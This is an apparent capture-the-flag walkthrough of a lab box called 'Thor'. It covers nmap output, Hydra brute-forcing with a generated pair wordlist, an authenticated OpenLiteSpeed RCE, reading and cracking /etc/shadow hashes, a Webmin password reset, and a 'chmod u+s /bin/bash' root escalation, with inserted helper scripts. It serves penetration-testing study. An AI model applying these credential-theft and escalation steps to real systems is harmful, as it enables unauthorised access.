Thor

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 3000 -Pn 192.168.201.208
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-15 11:13 +08
Nmap scan report for 192.168.201.208
Host is up (0.17s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
7080/tcp  open  empowerid
10000/tcp open  snet-sensor-mgmt

Did a detailed scan on the open web ports.

$ sudo nmap -p 80,7080,10000 -sC -sV --min-rate 3000 -Pn 192.168.201.208
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-15 11:16 +08
Nmap scan report for 192.168.201.208
Host is up (0.17s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          LiteSpeed
|_http-server-header: LiteSpeed
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.0 200 OK
|     etag: "85e2-604fc846-26fe7;;;"
|     last-modified: Mon, 15 Mar 2021 20:49:10 GMT
|     content-type: text/html
|     content-length: 34274
|     accept-ranges: bytes
|     date: Sat, 15 Jul 2023 03:16:12 GMT
|     server: LiteSpeed
|     connection: close
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <!--====== Required meta tags ======-->
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
|     <!--====== Title ======-->
|     <title>Jane Foster - Personal Portfolio</title>
|     <!--====== Favicon Icon ======-->
|     <link rel="shortcut icon" href="assets/images/favicon.png" type="image/png">
|     <!--====== Bootstrap css ======-->
|     <link rel="stylesheet" href="assets/css/bootstrap.min.css">
|     <!--====== Line Icons css ======-->
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     etag: "85e2-604fc846-26fe7;;;"
|     last-modified: Mon, 15 Mar 2021 20:49:10 GMT
|     content-type: text/html
|     content-length: 34274
|     accept-ranges: bytes
|     date: Sat, 15 Jul 2023 03:16:13 GMT
|     server: LiteSpeed
|     connection: close
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <!--====== Required meta tags ======-->
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
|     <!--====== Title ======-->
|     <title>Jane Foster - Personal Portfolio</title>
|     <!--====== Favicon Icon ======-->
|     <link rel="shortcut icon" href="assets/images/favicon.png" type="image/png">
|     <!--====== Bootstrap css ======-->
|     <link rel="stylesheet" href="assets/css/bootstrap.min.css">
|_    <!--====== Line Icons css ======-->
|_http-title: Jane Foster - Personal Portfolio
7080/tcp  open  ssl/empowerid LiteSpeed
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
| ssl-cert: Subject: commonName=ubuntu/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2022-06-07T09:39:58
|_Not valid after:  2024-09-04T09:39:58
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.0 302 Found
|     x-powered-by: PHP/5.6.36
|     x-frame-options: SAMEORIGIN
|     x-xss-protection: 1;mode=block
|     referrer-policy: same-origin
|     x-content-type-options: nosniff
|     set-cookie: LSUI37FE0C43B84483E0=6bde28c9fc90fbd8dbd0956db348c0f6; path=/; secure; HttpOnly
|     expires: Thu, 19 Nov 1981 08:52:00 GMT
|     cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|     pragma: no-cache
|     set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     location: /login.php
|     content-type: text/html; charset=UTF-8
|     content-length: 0
|     date: Sat, 15 Jul 2023 03:16:30 GMT
|     server: LiteSpeed
|     alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080";
|   HTTPOptions: 
|     HTTP/1.0 302 Found
|     x-powered-by: PHP/5.6.36
|     x-frame-options: SAMEORIGIN
|     x-xss-protection: 1;mode=block
|     referrer-policy: same-origin
|     x-content-type-options: nosniff
|     set-cookie: LSUI37FE0C43B84483E0=58c6a8490e64410d0e090353ed826ba0; path=/; secure; HttpOnly
|     expires: Thu, 19 Nov 1981 08:52:00 GMT
|     cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|     pragma: no-cache
|     set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     location: /login.php
|     content-type: text/html; charset=UTF-8
|     content-length: 0
|     date: Sat, 15 Jul 2023 03:16:31 GMT
|     server: LiteSpeed
|_    alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080";
| http-title: LiteSpeed WebAdmin Console
|_Requested resource was /login.php
|_http-server-header: LiteSpeed
10000/tcp open  http          MiniServ 1.962 (Webmin httpd)
|_http-server-header: MiniServ/1.962
|_http-title: Site doesn't have a title (text/html; Charset=utf-8).

Wordlist + Brute Force -> Creds + RCE

Port 80 hosted a portfolio page for Jane Foster:

At the bottom of the page, there was some contact details:

The box is named Thor, so it makes sense that something 'Thor' related will turn up, most likely in the credentials. From the nmap scan we know port 80 is served by LiteSpeed, and port 7080 is the LiteSpeed WebAdmin console (7080 is OpenLiteSpeed's default WebAdmin port, and nmap pulled the title 'LiteSpeed WebAdmin Console' from it). Both are likely operated by this Jane Foster.

Port 7080 reveals a login page:

There are some exploits available for this:

One of them is an RCE exploit, but it is authenticated: it needs valid WebAdmin credentials. Default and weak credentials don't work here, so we need to get crafty. We know Jane Foster is the one operating this site, so we can build a custom wordlist from the names and contact details present on the portfolio page.

I tried to brute force the login with Hydra using that wordlist, but it didn't work either. I took a hint, and it told me to keep brute forcing, so in this case we can try permutations of the words within our wordlist file.

This concatenates pairs of words from the list into new candidates. Then we brute force again with Hydra, using the combined list.
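The pair-combination step as an added shell example (this is not the writeup's own script): it takes a wordlist with one entry per line and prints every ordered pair of distinct words concatenated, optionally with a separator between them. The words jane, foster and thor in the sample list are an assumption drawn from the names mentioned on this page; the real list was built from the portfolio's contact details.

```shell
#!/bin/sh
# Added example: build a 'two words joined' wordlist for Hydra.
# Usage: combine_words WORDLIST [SEPARATOR]
#   WORDLIST  file with one word per line (blank lines are ignored)
#   SEPARATOR optional string placed between the two words (default: none)
# Prints each ordered pair of distinct words, so N words yield N*(N-1)
# candidates; pipe through sort -u if the input contains duplicates.
combine_words() {
    list=$1
    sep=${2:-}
    while IFS= read -r first; do
        [ -n "$first" ] || continue
        while IFS= read -r second; do
            [ -n "$second" ] || continue
            [ "$first" = "$second" ] && continue
            printf '%s%s%s\n' "$first" "$sep" "$second"
        done < "$list"
    done < "$list"
}

# write_sample_wordlist FILE: constructed sample list. The words are an
# assumption based on the names on the page, not the list used on the box.
write_sample_wordlist() {
    printf 'jane\nfoster\nthor\n' > "$1"
}

# Stand-alone demo: sh combine.sh demo  ->  writes combined.txt in the cwd
if [ "${1:-}" = "demo" ]; then
    tmp=$(mktemp)
    write_sample_wordlist "$tmp"
    combine_words "$tmp" > combined.txt
    wc -l combined.txt
    rm -f "$tmp"
fi
```

Pass the generated file to Hydra with -P in place of the original list. Since N words produce N*(N-1) candidates, prune the source list first; against a remote login the size of this list is what actually bounds the brute force time.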

This finds the correct password. With valid WebAdmin credentials we can then run the RCE exploit:

Privilege Escalation

Shadow Group -> Thor Creds

The shell we get from the exploit runs as a member of the shadow group, meaning we can read /etc/shadow:

We can pull the hashes for thor and root out of /etc/shadow and try to crack them with john. The hash for thor cracks, while the one for root does not.
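An added helper for the cracking step (not part of the original writeup): it reads a shadow file, skips locked and passwordless accounts, and labels each remaining hash with its crypt scheme so the right john format can be chosen before time is spent on a hash that won't crack. The sample shadow content is constructed and the hash values in it are placeholders, not hashes from the box.

```shell
#!/bin/sh
# Added example: list the crackable entries of a shadow file with their hash type.
# Usage: shadow_hashes SHADOW_FILE
# Output lines are user:hash:scheme; locked ('!', '*') and empty fields are skipped.
shadow_hashes() {
    while IFS=: read -r user hash _rest; do
        case "$hash" in
            ''|'!'*|'*'*) continue ;;          # locked account or no password set
            '$6$'*) scheme=sha512crypt ;;      # john --format=sha512crypt
            '$5$'*) scheme=sha256crypt ;;      # john --format=sha256crypt
            '$y$'*) scheme=yescrypt ;;         # newer Ubuntu default; john needs --format=crypt
            '$1$'*) scheme=md5crypt ;;         # john --format=md5crypt
            *)      scheme=unknown ;;
        esac
        printf '%s:%s:%s\n' "$user" "$hash" "$scheme"
    done < "$1"
}

# write_sample_shadow FILE: constructed test data. The hash strings are
# placeholders in the right format, not real hashes.
write_sample_shadow() {
    printf '%s\n' \
        'root:$6$rootsalt$rootplaceholderhash:19500:0:99999:7:::' \
        'thor:$6$thorsalt$thorplaceholderhash:19500:0:99999:7:::' \
        'daemon:*:19500:0:99999:7:::' \
        'jane:!:19500:0:99999:7:::' > "$1"
}
```

shadow_hashes /etc/shadow | cut -d: -f1,2 > hashes.txt gives john a user:hash file, and the third column tells you which --format to pass. On this box that is where it becomes clear that only thor's hash is worth the wordlist run.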

We can then ssh in as thor:

Sudo Webmin -> Webmin RCE

thor can restart the Webmin instance as root:

I almost forgot there was a Webmin instance.

Since the sudo rule only lets thor restart Webmin, the plan is to change the Webmin admin password on disk and then restart the service so it picks up the new one.

However, it appears that only the bin group has access to the /etc/webmin directory, which thor is not a member of:

Earlier, the OpenLiteSpeed RCE exploit required us to specify a group ID for the process it spawns, and I had used shadow. Re-running it with bin as the group gives a shell that can reach /etc/webmin, and we can use that shell to reset the password.

Then we can reset the password and restart Webmin as thor:
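A wrapper for the reset step, added here as an example rather than taken from the writeup. It checks first that the current process can write Webmin's user database, which is exactly the check that would have flagged the group problem before the first attempt, and then calls changepass.pl, the password-change script that ships with Webmin. Assumptions: the script lives under /usr/share/webmin (the Debian/Ubuntu package location), and the Webmin login being reset is root, which the page does not state.

```shell
#!/bin/sh
# Added example: reset a Webmin login from a shell, verifying write access to
# Webmin's user database first.
# Usage: webmin_reset_password CONF_DIR USER NEWPASS   (CONF_DIR is normally /etc/webmin)

# webmin_conf_writable CONF_DIR: 0 if CONF_DIR/miniserv.users is writable by
# this process, otherwise 1 with a diagnostic showing the file's owner and our ids.
webmin_conf_writable() {
    users_file="$1/miniserv.users"
    if [ -w "$users_file" ]; then
        return 0
    fi
    echo "no write access to $users_file" >&2
    echo "  file: $(ls -ld "$users_file" 2>&1)" >&2
    echo "  me:   $(id)" >&2
    return 1
}

webmin_reset_password() {
    conf=$1; user=$2; newpass=$3
    webmin_conf_writable "$conf" || return 1
    # changepass.pl ships with Webmin. /usr/share/webmin is where the
    # Debian/Ubuntu package installs it (assumption for this box; RPM
    # installs use /usr/libexec/webmin instead).
    perl /usr/share/webmin/changepass.pl "$conf" "$user" "$newpass"
}
```

From the bin-group shell: webmin_reset_password /etc/webmin root 'NewPass' (root as the Webmin username is the assumption noted above), then restart Webmin from the thor session through the sudo rule. From the original shadow-group shell the wrapper stops at the writability check and prints the owner of miniserv.users, which is the quickest way to see which group the exploit needs to be re-run with.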

Using this, we can login to Webmin and view the dashboard:

Within Webmin there is a >_ option which opens a terminal in the browser. Webmin itself runs as root, so the commands typed there run as root:

From that terminal we can just do chmod u+s /bin/bash, then go back to the thor ssh session and run /bin/bash -p for a proper root shell (without -p, bash drops the SUID effective uid back to the real one).
